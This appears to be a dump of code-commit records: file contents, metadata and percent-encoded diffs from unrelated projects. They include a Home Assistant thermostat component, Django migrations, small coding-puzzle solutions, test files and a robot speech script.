heater_entity_id = config.get(CONF_HEATER)
sensor_entity_id = config.get(CONF_SENSOR)
min_temp = util.convert(config.get(CONF_MIN_TEMP), float, None)
max_temp = util.convert(config.get(CONF_MAX_TEMP), float, None)
target_temp = util.convert(config.get(CONF_TARGET_TEMP), float, None)
if None in (heater_entity_id, sensor_entity_id):
_LOGGER.error('Missing required key %s or %s', CONF_HEATER,
CONF_SENSOR)
return False
add_devices([HeatControl(hass, name, heater_entity_id, sensor_entity_id,
min_temp, max_temp, target_temp)])
# pylint: disable=too-many-instance-attributes
class HeatControl(ThermostatDevice):
""" Represents a HeatControl device. """
def __init__(self, hass, name, heater_entity_id, sensor_entity_id,
min_temp, max_temp, target_temp):
self.hass = hass
self._name = name
self.heater_entity_id = heater_entity_id
self._active = False
self._cur_temp = None
self._min_temp = min_temp
self._max_temp = max_temp
self._target_temp = target_temp
self._unit = None
track_state_change(hass, sensor_entity_id, self._sensor_changed)
sensor_state = hass.states.get(sensor_entity_id)
if sensor_state:
self._update_temp(sensor_state)
@property
def should_poll(self):
return False
@property
def name(self):
""" Returns the name. """
return self._name
@property
def unit_of_measurement(self):
""" Returns the unit of measurement. """
return self._unit
@property
def current_temperature(self):
""" Returns the sensor temperature. """
return self._cur_temp
@property
def operation(self):
""" Returns current operation ie. heat, cool, idle """
return STATE_HEAT if self._active and self._is_heating else STATE_IDLE
@property
def target_temperature(self):
""" Returns the temperature we try to reach. """
return self._target_temp
def set_temperature(self, temperature):
""" Set new target temperature. """
self._target_temp = temperature
self._control_heating()
self.update_ha_state()
@property
def min_temp(self):
""" Return minimum temperature. """
if self._min_temp:
return self._min_temp
else:
# pylint: disable=no-member
return ThermostatDevice.min_temp.fget(self)
@property
def max_temp(self):
""" Return maximum temperature. """
if self._min_temp:
return self._max_temp
else:
# pylint: disable=no-member
return ThermostatDevice.max_temp.fget(self)
def _sensor_changed(self, entity_id, old_state, new_state):
""" Called when temperature changes. """
if new_state is None:
return
self._update_temp(new_state)
self._control_heating()
self.update_ha_state()
def _update_temp(self, state):
""" Update thermostat with latest state from sensor. """
unit = state.attributes.get(ATTR_UNIT_OF_MEASUREMENT)
if unit not in (TEMP_CELCIUS, TEMP_FAHRENHEIT):
self._cur_temp = None
self._unit = None
_LOGGER.error('Sensor has unsupported unit: %s (allowed: %s, %s)',
unit, TEMP_CELCIUS, TEMP_FAHRENHEIT)
return
temp = util.convert(state.state, float)
if temp is None:
self._cur_temp = None
self._unit = None
_LOGGER.error('Unable to parse sensor temperature: %s',
state.state)
return
self._cur_temp = temp
self._unit = unit
def _control_heating(self):
""" Check if we need to turn heating on or off. """
if not self._active and None not in (self._cur_temp,
self._target_temp):
self._active = True
_LOGGER.info('Obtained current and target temperature. '
'Heat control active.')
if not self._active:
return
too_cold = self._target_temp - self._cur_temp > TOL_TEMP
is_heating = self._is_heating
if too_cold and not is_heating:
_LOGGER.info('Turning on heater %s', self.heater_entity_id)
switch.turn_on(self.hass, self.heater_entity_id)
elif not too_cold and is_heating:
_LOGGER.info('Turning off heater %s', self.heater_entity_id)
switch.turn_off(self.hass, self.heater_entity_id)
@property
def _is_heating(self):
""" If the heater is currently heating. """
return switch.is_on(self.hass, self.heater_entity_id)
|
Python
| 0.000001 |
@@ -1899,16 +1899,56 @@
ce. %22%22%22%0A
+ # pylint: disable=too-many-arguments
%0A def
|
63f9f87a3f04cb03c1e286cc5b6d49306f90e352
|
Add solution for problem 4
|
python/004_largest_palindrome_product/palindrome_product.py
|
python/004_largest_palindrome_product/palindrome_product.py
|
Python
| 0.001666 |
@@ -0,0 +1,309 @@
+from itertools import combinations_with_replacement%0Afrom operator import mul%0A%0Athree_digit_numbers = tuple(range(100, 1000))%0A%0Acombinations = combinations_with_replacement(three_digit_numbers, 2)%0A%0Aproducts = %5Bmul(*x) for x in combinations%5D%0A%0Amax_palindrome = max(%5Bx for x in products if str(x)%5B::-1%5D == str(x)%5D)%0A
|
|
634d703f207d81f817c5bd834e6695d6a439e9a8
|
fix ImportError with pytest.mark.tf2 (#6050)
|
python/chronos/test/bigdl/chronos/forecaster/tf/__init__.py
|
python/chronos/test/bigdl/chronos/forecaster/tf/__init__.py
|
Python
| 0 |
@@ -0,0 +1,586 @@
+#%0A# Copyright 2016 The BigDL Authors.%0A#%0A# Licensed under the Apache License, Version 2.0 (the %22License%22);%0A# you may not use this file except in compliance with the License.%0A# You may obtain a copy of the License at%0A#%0A# http://www.apache.org/licenses/LICENSE-2.0%0A#%0A# Unless required by applicable law or agreed to in writing, software%0A# distributed under the License is distributed on an %22AS IS%22 BASIS,%0A# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.%0A# See the License for the specific language governing permissions and%0A# limitations under the License.%0A#%0A
|
|
186442a5b50e760f0a3c814cb272c909606ad91a
|
Create find_factors_down_to_limit.py
|
find_factors_down_to_limit.py
|
find_factors_down_to_limit.py
|
Python
| 0.000022 |
@@ -0,0 +1,240 @@
+#Kunal Gautam%0A#Codewars : @Kunalpod%0A#Problem name: Find Factors Down to Limit%0A#Problem level: 8 kyu%0A%0Adef factors(integer, limit):%0A return %5Bx for x in range(limit,(integer//2)+1) if not integer%25x%5D + (%5Binteger%5D if integer%3E=limit else %5B%5D) %0A
|
|
aeeb0e6819439db84f3f7e16ac3f85fd36441315
|
add unit test
|
stomp/test/utils_test.py
|
stomp/test/utils_test.py
|
Python
| 0.000001 |
@@ -0,0 +1,318 @@
+import unittest%0A%0Afrom stomp.utils import *%0A%0Aclass TestUtils(unittest.TestCase):%0A def testReturnsTrueWhenLocalhost(self):%0A self.assertEquals(1, is_localhost(('localhost', 8000)))%0A self.assertEquals(1, is_localhost(('127.0.0.1', 8000)))%0A self.assertEquals(2, is_localhost(('192.168.1.92', 8000)))
|
|
e9e06a0b85656eb8ce70aff1ac81737a7ffaece3
|
Add migration for extended feedback; #909
|
judge/migrations/0083_extended_feedback.py
|
judge/migrations/0083_extended_feedback.py
|
Python
| 0 |
@@ -0,0 +1,511 @@
+# -*- coding: utf-8 -*-%0A# Generated by Django 1.11.15 on 2019-03-15 23:18%0Afrom __future__ import unicode_literals%0A%0Afrom django.db import migrations, models%0A%0A%0Aclass Migration(migrations.Migration):%0A%0A dependencies = %5B%0A ('judge', '0082_remove_profile_name'),%0A %5D%0A%0A operations = %5B%0A migrations.AddField(%0A model_name='submissiontestcase',%0A name='extended_feedback',%0A field=models.TextField(blank=True, verbose_name='extended judging feedback'),%0A ),%0A %5D%0A
|
|
d410fb26d3fb8bbd843234e90891bee5a5fff7e7
|
Add local dev settings module
|
halaqat/settings/local_settings.py
|
halaqat/settings/local_settings.py
|
Python
| 0 |
@@ -0,0 +1,175 @@
+from .base_settings import *%0A%0ADEBUG = True%0A%0ALANGUAGE_CODE = 'en'%0A%0ATIME_FORMAT = %5B%0A%0A '%25I:%25M %25p',%0A '%25H:%25M %25p',%0A%5D%0A%0A%0ATIME_INPUT_FORMATS = %5B%0A '%25I:%25M %25p',%0A '%25H:%25M %25p'%0A%5D%0A
|
|
ce6c7a9e474c876829597861ce35b797b2509d42
|
Add conftest.py for pytest
|
conftest.py
|
conftest.py
|
Python
| 0.000007 |
@@ -0,0 +1,71 @@
+# This file must exist for pytest to add this directory to %60sys.path%60.%0A
|
|
cca26b50f02f098d3157501bd64e9f990fc061e2
|
Create solution.py
|
leetcode/easy/valid_anagram/py/solution.py
|
leetcode/easy/valid_anagram/py/solution.py
|
Python
| 0.000018 |
@@ -0,0 +1,343 @@
+#%0A# Anagram definition:%0A# https://en.wikipedia.org/wiki/Anagram%0A#%0A# Classic solution to the anagram problem.%0A# Sort both strings and check if they are equal.%0A#%0A%0Aclass Solution(object):%0A def isAnagram(self, s, t):%0A %22%22%22%0A :type s: str%0A :type t: str%0A :rtype: bool%0A %22%22%22%0A return sorted(s) == sorted(t)%0A
|
|
477a57b108499184acb4d74f7aa14b7a8e10f6d8
|
Create naturalreaderspeech-test.py
|
home/CheekyMonkey/naturalreaderspeech-test.py
|
home/CheekyMonkey/naturalreaderspeech-test.py
|
Python
| 0.000018 |
@@ -0,0 +1,1846 @@
+# cycle through NaturalReaderSpeech voices%0A# with i2c connected jaw servo%0A# Author: Acapulco Rolf%0A# Date: October 4th 2017%0A# Build: myrobotlab development build version 2555%0A%0Afrom time import sleep %0Afrom org.myrobotlab.service import Speech%0Alang=%22EN%22 #for NaturalReaderSpeech%0AVoice=%22Ryan%22 %0AvoiceType = Voice%0Aspeech = Runtime.createAndStart(%22Speech%22, %22NaturalReaderSpeech%22)%0Aspeech.setVoice(voiceType)%0Aspeech.setLanguage(lang)%0A%0Afrequency%09= 50 #50 Hz servo frequency%0A %0AadaFruit16c1 = Runtime.createAndStart(%22AdaFruit16C1%22,%22Adafruit16CServoDriver%22)%0Araspi = Runtime.createAndStart(%22RasPi%22,%22RasPi%22)%0AadaFruit16c1.setController(%22RasPi%22,%221%22,%220x40%22)%0AadaFruit16c1.setPWMFreq(0,frequency) %0A%0AjawPin = 8%0AjawServo = Runtime.createAndStart(%22jaw%22,%22Servo%22)%0Amouth = Runtime.createAndStart(%22Mouth%22,%22MouthControl%22)%0Asleep(20) #fix for servo attach timing issue as at myrobotlab 236x development builds%0A%0AjawServo.attach(adaFruit16c1,jawPin,150,-1)%0Ajaw = mouth.getJaw()%0Asleep(1)%0Ajaw.attach(adaFruit16c1,jawPin)%0A%0AjawServo.setMinMax(140,180) # set min and max jaw position accordingly for your own use-case%0A%09%09%09%09%09%09%09# these min/max settings work for me for this particular jaw: https://www.thingiverse.com/thing:992918%0A%09%09%09%09%09%09%09# @Mats, thanks :) %09%09%09%09%0AjawServo.setRest(175)%0AjawServo.moveTo(100)%0AjawServo.rest()%0Amouth.setmouth(140,175)%0Amouth.autoAttach = False%0Amouth.setMouth(speech)%0A%0A%0Adef onEndSpeaking(text):%0A%09sleep(.5)%09%0A%09#Start of main script%0A%09sleep(1)%0A%09speech.speakBlocking(text)%09%0A%09mouth.jaw.moveTo(175)%0A%09%0A%0Adef saystuff():%0A%09myvoices = %5B'Ryan','Rich','Mike','Graham','Laura','Charles','Crystal','Heather','Ella','Rod','Peter','Audrey','Lucy','Rachel','Rosy','Ryan'%5D%0A%09myvoicescount = len(myvoices)%0A%09for i in range(0,myvoicescount):%0A%09%09speech.setVoice(myvoices%5Bi%5D)%0A%09%09onEndSpeaking 
(%22I'm completely operational, and all my circuits are functioning perfectly.%22)%0A%09%09%0A%0Asaystuff()%0A
|
|
53dcffd4677987e6186182484e58fccde1e93d60
|
change file name
|
h2o-py/test_hadoop/pyunit_hadoop.py
|
h2o-py/test_hadoop/pyunit_hadoop.py
|
Python
| 0.000008 |
@@ -0,0 +1,826 @@
+import sys%0Asys.path.insert(1,%22../%22)%0Aimport h2o%0Afrom tests import pyunit_utils%0Afrom h2o.estimators.glm import H2OGeneralizedLinearEstimator%0Aimport os%0A%0A%0Adef test_hadoop():%0A '''%0A Test H2O read and write to hdfs%0A '''%0A hdfs_name_node = os.getenv(%22NAME_NODE%22)%0A h2o_data = h2o.import_file(%22hdfs://%22 + hdfs_name_node + %22/datasets/100k.csv%22)%0A print h2o_data.head()%0A h2o_data.summary()%0A%0A h2o_glm = H2OGeneralizedLinearEstimator(family=%22binomial%22, alpha=0.5, Lambda=0.01)%0A h2o_glm.train(x=range(1, h2o_data.ncol), y=0, training_frame=h2o_data)%0A%0A hdfs_model_path = os.getenv(%22MODEL_PATH%22)%0A h2o.save_model(h2o_glm, %22hdfs://%22 + hdfs_model_path)%0A%0A new_model = h2o.load_model(%22hdfs://%22 + hdfs_model_path)%0A%0A%0A%0Aif __name__ == %22__main__%22:%0A pyunit_utils.standalone_test(test_hadoop)%0Aelse:%0A test_hadoop()%0A%0A
|
|
83ba7a60e3e0cda9f081527e63e0aedf43c1a751
|
introduce a helper function to eliminate duplicate code to process optional keyword arguments for .schema.gen_schema
|
anyconfig/schema.py
|
anyconfig/schema.py
|
#
# Copyright (C) 2015, 2016 Satoru SATOH <ssato redhat.com>
# License: MIT
#
"""anyconfig.schema module.
.. versionchanged:: 0.6.99
allow passing `ac_schema_type` ('basic' == default or 'strict') to API
:func:`gen_schema` to switch type of schema object generated
.. versionadded:: 0.0.11
Added new API :func:`gen_schema` to generate schema object
.. versionadded:: 0.0.10
Added new API :func:`validate` to validate config with JSON schema
"""
from __future__ import absolute_import
try:
import jsonschema
except ImportError:
pass
import anyconfig.compat
_SIMPLETYPE_MAP = {list: "array", tuple: "array",
bool: "boolean",
int: "integer", float: "number",
dict: "object",
str: "string"}
_SIMPLE_TYPES = (bool, int, float, str)
if not anyconfig.compat.IS_PYTHON_3:
try:
_SIMPLETYPE_MAP[unicode] = "string"
_SIMPLE_TYPES = (bool, int, float, str, unicode)
except NameError:
pass
def validate(obj, schema, **options):
"""
Validate target object with given schema object, loaded from JSON schema.
See also: https://python-jsonschema.readthedocs.org/en/latest/validate/
:parae obj: Target object (a dict or a dict-like object) to validate
:param schema: Schema object (a dict or a dict-like object)
instantiated from schema JSON file or schema JSON string
:param options: Other keyword options such as:
- format_checker: A format property checker object of which class is
inherited from jsonschema.FormatChecker, it's default if None given.
- safe: Exception (jsonschema.ValidationError or jsonschema.SchemaError
or others) will be thrown during validation process due to any
validation or related errors. However, these will be catched by
default, and will be re-raised if `safe` is False.
:return: (True if validation succeeded else False, error message)
"""
format_checker = options.get("format_checker", None)
try:
if format_checker is None:
format_checker = jsonschema.FormatChecker() # :raises: NameError
try:
jsonschema.validate(obj, schema, format_checker=format_checker)
return (True, '')
except (jsonschema.ValidationError, jsonschema.SchemaError,
Exception) as exc:
if options.get("safe", True):
return (False, str(exc))
else:
raise
except NameError:
return (True, "Validation module (jsonschema) is not available")
return (True, '')
_BASIC_SCHEMA_TYPE = "basic"
_STRICT_SCHEMA_TYPE = "strict"
def array_to_schema(arr, **options):
"""
Generate a JSON schema object with type annotation added for given object.
:param arr: Array of dict or MergeableDict objects
:param options: Other keyword options such as:
- ac_schema_type: Specify the type of schema to generate from 'basic'
(basic and minimum schema) and 'strict' (more precise schema)
- ac_schema_typemap: Type to JSON schema type mappings
:return: Another MergeableDict instance represents JSON schema of items
"""
typemap = options.get("ac_schema_typemap", _SIMPLETYPE_MAP)
strict = options.get("ac_schema_type", False) == _STRICT_SCHEMA_TYPE
arr = list(arr)
scm = dict(type=typemap[list],
items=gen_schema(arr[0] if arr else "str", **options))
if strict:
nitems = len(arr)
scm["minItems"] = nitems
scm["uniqueItems"] = len(set(arr)) == nitems
return scm
def object_to_schema(obj, **options):
"""
Generate a node represents JSON schema object with type annotation added
for given object node.
:param obj: Dict or MergeableDict object
:param options: Other keyword options such as:
- ac_schema_type: Specify the type of schema to generate from 'basic'
(basic and minimum schema) and 'strict' (more precise schema)
- ac_schema_typemap: Type to JSON schema type mappings
:yield: Another MergeableDict instance represents JSON schema of object
"""
typemap = options.get("ac_schema_typemap", _SIMPLETYPE_MAP)
strict = options.get("ac_schema_type", False) == _STRICT_SCHEMA_TYPE
props = dict((k, gen_schema(v, **options)) for k, v in obj.items())
scm = dict(type=typemap[dict], properties=props)
if strict:
scm["required"] = sorted(props.keys())
return scm
def gen_schema(node, **options):
"""
Generate a node represents JSON schema object with type annotation added
for given object node.
:param node: Config data object (dict[-like] or namedtuple)
:param options: Other keyword options such as:
- ac_schema_type: Specify the type of schema to generate from 'basic'
(basic and minimum schema) and 'strict' (more precise schema)
- ac_schema_typemap: Type to JSON schema type mappings
:return: A dict represents JSON schema of this node
"""
if node is None:
return dict(type="null")
_type = type(node)
if _type in _SIMPLE_TYPES:
typemap = options.get("ac_schema_typemap", _SIMPLETYPE_MAP)
scm = dict(type=typemap[_type])
elif isinstance(node, dict):
scm = object_to_schema(node, **options)
elif _type in (list, tuple) or hasattr(node, "__iter__"):
scm = array_to_schema(node, **options)
return scm
# vim:sw=4:ts=4:et:
|
Python
| 0.000003 |
@@ -2694,16 +2694,333 @@
rict%22%0A%0A%0A
+def _process_options(**options):%0A %22%22%22%0A Helper function to process keyword arguments passed to gen_schema.%0A%0A :return: A tuple of (typemap :: dict, strict :: bool)%0A %22%22%22%0A return (options.get(%22ac_schema_typemap%22, _SIMPLETYPE_MAP),%0A options.get(%22ac_schema_type%22, False) == _STRICT_SCHEMA_TYPE)%0A%0A%0A
def arra
@@ -3040,32 +3040,32 @@
rr, **options):%0A
-
%22%22%22%0A Gene
@@ -3549,140 +3549,55 @@
-typemap = options.get(%22ac_schema_
+(
typemap
-%22
,
- _SIMPLETYPE_MAP)%0A
strict
+)
=
-options.get(%22ac_schema_type%22, False) == _STRICT_SCHEMA_TYPE
+_process_options(**options)
%0A%0A
@@ -4418,140 +4418,55 @@
-typemap = options.get(%22ac_schema_
+(
typemap
-%22
,
- _SIMPLETYPE_MAP)%0A
strict
+)
=
-options.get(%22ac_schema_type%22, False) == _STRICT_SCHEMA_TYPE
+_process_options(**options)
%0A%0A
|
8edf8bbd341c8b3e8395784667da5c577aba7ac6
|
Add betting.py program
|
ibm-ponder-this/2015-05/betting.py
|
ibm-ponder-this/2015-05/betting.py
|
Python
| 0.000001 |
@@ -0,0 +1,2200 @@
+%0Afrom __future__ import print_function%0Aimport itertools%0Aimport collections%0Aimport sys%0A%0Aclass BettingGame(object):%0A def __init__(self, max_value=256, num_players=3):%0A self.max_value = max_value%0A self.num_players = num_players%0A self.STOP_STATE = tuple(0 for i in xrange(self.num_players))%0A%0A def do_all(self):%0A print('Creating states', file=sys.stderr)%0A states = set(itertools.imap(self.makestate, itertools.product(xrange(1, self.max_value + 1), repeat=self.num_players)))%0A print('Done creating states', file=sys.stderr)%0A reverse_edges = collections.defaultdict(set)%0A for state in states:%0A for target in self.transitions(state):%0A reverse_edges%5Btarget%5D.add(state)%0A print('Done adding all transitions', file=sys.stderr)%0A self.breadth_first(reverse_edges, self.STOP_STATE)%0A%0A def makestate(self, s):%0A return tuple(sorted(s))%0A%0A def transitions(self, state):%0A %22%22%22%0A Possible transitions from a state.%0A %22%22%22%0A if len(set(state)) %3C len(state):%0A yield self.STOP_STATE%0A return%0A for hidx in xrange(self.num_players):%0A for lidx in xrange(hidx):%0A (lower, higher) = (state%5Blidx%5D, state%5Bhidx%5D)%0A yield self.makestate(((2*lower) if (i == lidx) else ((higher - lower) if (i == hidx) else s)) for (i, s) in enumerate(state))%0A%0A def breadth_first(self, edges, start):%0A # worklist contains (element, distance_from_start)%0A worklist = collections.deque()%0A worklist.appendleft((start, 0))%0A # already_seen contains elements%0A already_seen = set(%5B start %5D)%0A while worklist:%0A (element, distance) = (last_seen, _) = worklist.pop()%0A# print('Element, Distance, ', element, distance, file=sys.stderr)%0A for neighbor in edges%5Belement%5D:%0A if (neighbor in already_seen):%0A continue%0A already_seen.add(neighbor)%0A worklist.appendleft((neighbor, distance+1))%0A print('Last seen: %7B%7D'.format(last_seen))%0A print('Distance: %7B%7D'.format(distance))%0A%0ABettingGame(max_value=256).do_all()%0A
|
|
61822398dbd2a3819a15b8c33f1cd69ff2953b5a
|
Move animation.fill from BiblioPixelAnimation
|
bibliopixel/animation/fill.py
|
bibliopixel/animation/fill.py
|
Python
| 0 |
@@ -0,0 +1,799 @@
+from . animation import BaseAnimation%0Afrom .. util import colors%0A%0A%0Aclass Fill(BaseAnimation):%0A %22%22%22%0A Fill the screen with a single color.%0A %22%22%22%0A def __init__(self, *args, color='black', **kwds):%0A super().__init__(*args, preclear=False, **kwds)%0A%0A is_numpy = hasattr(self.color_list, 'dtype')%0A self._set_color = self._set_numpy if is_numpy else self._set_classic%0A%0A def pre_run(self):%0A self.color = self._color%0A%0A @property%0A def color(self):%0A return self._color%0A%0A @color.setter%0A def color(self, color):%0A self._color = colors.make_color(color)%0A self._set_color()%0A%0A def _set_numpy(self):%0A self.color_list%5B:None%5D = self._color%0A%0A def _set_classic(self):%0A self.color_list%5B:%5D = %5Bself._color%5D * len(self.color_list)%0A
|
|
38651a6f690e39f5d5f64cdd389b031d653dcf95
|
add migration for credit app status
|
src/wellsfargo/migrations/0028_auto_20190401_1213.py
|
src/wellsfargo/migrations/0028_auto_20190401_1213.py
|
Python
| 0 |
@@ -0,0 +1,1608 @@
+# Generated by Django 2.2 on 2019-04-01 16:13%0A%0Afrom django.db import migrations, models%0A%0A%0Aclass Migration(migrations.Migration):%0A%0A dependencies = %5B%0A ('wellsfargo', '0027_auto_20190208_1635'),%0A %5D%0A%0A operations = %5B%0A migrations.AlterField(%0A model_name='cacreditapp',%0A name='status',%0A field=models.CharField(choices=%5B('', 'Unknown'), ('E0', 'Approved'), ('E1', 'Pending'), ('E2', 'Format Error'), ('E3', 'Wells Fargo Error'), ('E4', 'Denied')%5D, default='', max_length=2, verbose_name='Application Status'),%0A ),%0A migrations.AlterField(%0A model_name='cajointcreditapp',%0A name='status',%0A field=models.CharField(choices=%5B('', 'Unknown'), ('E0', 'Approved'), ('E1', 'Pending'), ('E2', 'Format Error'), ('E3', 'Wells Fargo Error'), ('E4', 'Denied')%5D, default='', max_length=2, verbose_name='Application Status'),%0A ),%0A migrations.AlterField(%0A model_name='uscreditapp',%0A name='status',%0A field=models.CharField(choices=%5B('', 'Unknown'), ('E0', 'Approved'), ('E1', 'Pending'), ('E2', 'Format Error'), ('E3', 'Wells Fargo Error'), ('E4', 'Denied')%5D, default='', max_length=2, verbose_name='Application Status'),%0A ),%0A migrations.AlterField(%0A model_name='usjointcreditapp',%0A name='status',%0A field=models.CharField(choices=%5B('', 'Unknown'), ('E0', 'Approved'), ('E1', 'Pending'), ('E2', 'Format Error'), ('E3', 'Wells Fargo Error'), ('E4', 'Denied')%5D, default='', max_length=2, verbose_name='Application Status'),%0A ),%0A %5D%0A
|
|
954b6d2152df52c330d59fe2b3b1cf65f5dd22cf
|
Create Str2Int_001.py
|
leetcode/008-String-to-Integer/Str2Int_001.py
|
leetcode/008-String-to-Integer/Str2Int_001.py
|
Python
| 0.000334 |
@@ -0,0 +1,1880 @@
+#@author: cchen%0A#Terrible code, and it will be updated and simplified later.%0A%0Aclass Solution:%0A # @param %7Bstring%7D str%0A # @return %7Binteger%7D%0A def extractnum(self, ss):%0A num = 0%0A for i in range(len(ss)):%0A if ss%5Bi%5D.isdigit() == False:%0A break%0A else:%0A num = num + 1%0A return ss%5B:num%5D%0A %0A def isoverflow(self, sss, ispos):%0A %0A if ispos:%0A tmp = '2147483647'%0A if len(sss) %3E len(tmp):%0A return True%0A elif len(sss) %3C len(tmp):%0A return False%0A for j in range(len(tmp)):%0A if sss%5Bj%5D %3E tmp%5Bj%5D:%0A return True%0A elif sss%5Bj%5D %3C tmp%5Bj%5D:%0A return False%0A return False%0A else:%0A tmp = '2147483648'%0A if len(sss) %3E len(tmp):%0A return True%0A elif len(sss) %3C len(tmp):%0A return False%0A for j in range(len(tmp)):%0A if sss%5Bj%5D %3E tmp%5Bj%5D:%0A return True%0A elif sss%5Bj%5D %3C tmp%5Bj%5D:%0A return False%0A return False%0A %0A def myAtoi(self, str):%0A str = str.strip()%0A if len(str) == 0:%0A return 0%0A flag = True%0A if str%5B0%5D == '+':%0A str = str%5B1:%5D%0A elif str%5B0%5D == '-':%0A str = str%5B1:%5D%0A flag = False%0A if len(str) == 0 or str%5B0%5D.isdigit() == False:%0A return 0%0A if flag:%0A n = self.extractnum(str)%0A if self.isoverflow(n, True) == True:%0A return 2147483647%0A else:%0A return int(n)%0A else:%0A n = self.extractnum(str)%0A if self.isoverflow(n, False) == True:%0A return -2147483648%0A else:%0A return -int(n)%0A
|
|
d6cac08be66b71912d0d475c6ed9a1e63a61691a
|
Update heat_control.py
|
homeassistant/components/thermostat/heat_control.py
|
homeassistant/components/thermostat/heat_control.py
|
"""
homeassistant.components.thermostat.heat_control
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Adds support for heat control units.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/thermostat.heat_control/
"""
import logging
import homeassistant.util as util
from homeassistant.components import switch
from homeassistant.components.thermostat import (ThermostatDevice, STATE_IDLE,
STATE_HEAT)
from homeassistant.helpers.event import track_state_change
from homeassistant.const import (
ATTR_UNIT_OF_MEASUREMENT, TEMP_CELCIUS, TEMP_FAHRENHEIT)
DEPENDENCIES = ['switch', 'sensor']
TOL_TEMP = 0.3
CONF_NAME = 'name'
DEFAULT_NAME = 'Heat Control'
CONF_HEATER = 'heater'
CONF_SENSOR = 'target_sensor'
CONF_MIN_TEMP = 'min_temp'
CONF_MAX_TEMP = 'max_temp'
CONF_TARGET_TEMP = 'target_temp'
_LOGGER = logging.getLogger(__name__)
# pylint: disable=unused-argument
def setup_platform(hass, config, add_devices, discovery_info=None):
""" Sets up the heat control thermostat. """
name = config.get(CONF_NAME, DEFAULT_NAME)
heater_entity_id = config.get(CONF_HEATER)
sensor_entity_id = config.get(CONF_SENSOR)
min_temp = util.convert(config.get(CONF_MIN_TEMP), float, None)
max_temp = util.convert(config.get(CONF_MAX_TEMP), float, None)
target_temp = util.convert(config.get(CONF_TARGET_TEMP), float, None)
if None in (heater_entity_id, sensor_entity_id):
_LOGGER.error('Missing required key %s or %s', CONF_HEATER,
CONF_SENSOR)
return False
add_devices([HeatControl(hass, name, heater_entity_id, sensor_entity_id,
min_temp, max_temp, target_temp)])
# pylint: disable=too-many-instance-attributes
class HeatControl(ThermostatDevice):
""" Represents a HeatControl device. """
# pylint: disable=too-many-arguments
def __init__(self, hass, name, heater_entity_id, sensor_entity_id,
min_temp, max_temp, target_temp):
self.hass = hass
self._name = name
self.heater_entity_id = heater_entity_id
self._active = False
self._cur_temp = None
self._min_temp = min_temp
self._max_temp = max_temp
self._target_temp = target_temp
self._unit = None
track_state_change(hass, sensor_entity_id, self._sensor_changed)
sensor_state = hass.states.get(sensor_entity_id)
if sensor_state:
self._update_temp(sensor_state)
@property
def should_poll(self):
return False
@property
def name(self):
""" Returns the name. """
return self._name
@property
def unit_of_measurement(self):
""" Returns the unit of measurement. """
return self._unit
@property
def current_temperature(self):
""" Returns the sensor temperature. """
return self._cur_temp
@property
def operation(self):
""" Returns current operation ie. heat, cool, idle """
return STATE_HEAT if self._active and self._is_heating else STATE_IDLE
@property
def target_temperature(self):
""" Returns the temperature we try to reach. """
return self._target_temp
def set_temperature(self, temperature):
""" Set new target temperature. """
self._target_temp = temperature
self._control_heating()
self.update_ha_state()
@property
def min_temp(self):
""" Return minimum temperature. """
if self._min_temp:
return self._min_temp
else:
# pylint: disable=no-member
return ThermostatDevice.min_temp.fget(self)
@property
def max_temp(self):
""" Return maximum temperature. """
if self._min_temp:
return self._max_temp
else:
# pylint: disable=no-member
return ThermostatDevice.max_temp.fget(self)
def _sensor_changed(self, entity_id, old_state, new_state):
""" Called when temperature changes. """
if new_state is None:
return
self._update_temp(new_state)
self._control_heating()
self.update_ha_state()
def _update_temp(self, state):
""" Update thermostat with latest state from sensor. """
unit = state.attributes.get(ATTR_UNIT_OF_MEASUREMENT)
if unit not in (TEMP_CELCIUS, TEMP_FAHRENHEIT):
self._cur_temp = None
self._unit = None
_LOGGER.error('Sensor has unsupported unit: %s (allowed: %s, %s)',
unit, TEMP_CELCIUS, TEMP_FAHRENHEIT)
return
temp = util.convert(state.state, float)
if temp is None:
self._cur_temp = None
self._unit = None
_LOGGER.error('Unable to parse sensor temperature: %s',
state.state)
return
self._cur_temp = temp
self._unit = unit
def _control_heating(self):
""" Check if we need to turn heating on or off. """
if not self._active and None not in (self._cur_temp,
self._target_temp):
self._active = True
_LOGGER.info('Obtained current and target temperature. '
'Heat control active.')
if not self._active:
return
too_cold = self._target_temp - self._cur_temp > TOL_TEMP
is_heating = self._is_heating
if too_cold and not is_heating:
_LOGGER.info('Turning on heater %s', self.heater_entity_id)
switch.turn_on(self.hass, self.heater_entity_id)
elif not too_cold and is_heating:
_LOGGER.info('Turning off heater %s', self.heater_entity_id)
switch.turn_off(self.hass, self.heater_entity_id)
@property
def _is_heating(self):
""" If the heater is currently heating. """
return switch.is_on(self.hass, self.heater_entity_id)
|
Python
| 0.000001 |
@@ -3556,32 +3556,68 @@
emperature. %22%22%22%0A
+ # pylint: disable=no-member%0A
if self.
@@ -3693,33 +3693,41 @@
#
-pylint: disable=no-member
+get default temp from super class
%0A
@@ -3854,32 +3854,68 @@
emperature. %22%22%22%0A
+ # pylint: disable=no-member%0A
if self.
@@ -3991,33 +3991,41 @@
#
-pylint: disable=no-member
+get default temp from super class
%0A
|
af6fb23f87651d5cdce3730d2cf2f2b10b571837
|
test script for ngram matrix creation
|
dsl/features/create_ngram_matrix.py
|
dsl/features/create_ngram_matrix.py
|
Python
| 0 |
@@ -0,0 +1,304 @@
+from sys import argv%0A%0Afrom featurize import Tokenizer, Featurizer%0A%0A%0Adef main():%0A N = int(argv%5B1%5D) if len(argv) %3E 1 else 3%0A t = Tokenizer()%0A f = Featurizer(t, N=N)%0A docs = f.featurize_in_directory(argv%5B2%5D)%0A m = f.to_dok_matrix(docs)%0A print m.shape%0A%0Aif __name__ == '__main__':%0A main()%0A
|
|
15ff98ef08fd45354f0df4b4566c240ad84d1c31
|
add ProductCategory model test
|
eca_catalogue/tests/models_tests.py
|
eca_catalogue/tests/models_tests.py
|
Python
| 0.000001 |
@@ -0,0 +1,256 @@
+from django.test import TestCase%0A%0Afrom eca_catalogue.tests.models import ProductCategory%0A%0A%0Aclass ProductCategoryTestCase(TestCase):%0A def test_model(self):%0A obj = ProductCategory.add_root(name=%22cat1%22, slug=%22cat1%22)%0A self.assertTrue(obj.pk)%0A%0A
|
|
ad74605039052c3dd7d343c84dd1ac24f068b34f
|
Bump version to 0.3.15
|
coil/__init__.py
|
coil/__init__.py
|
# Copyright (c) 2005-2006 Itamar Shtull-Trauring.
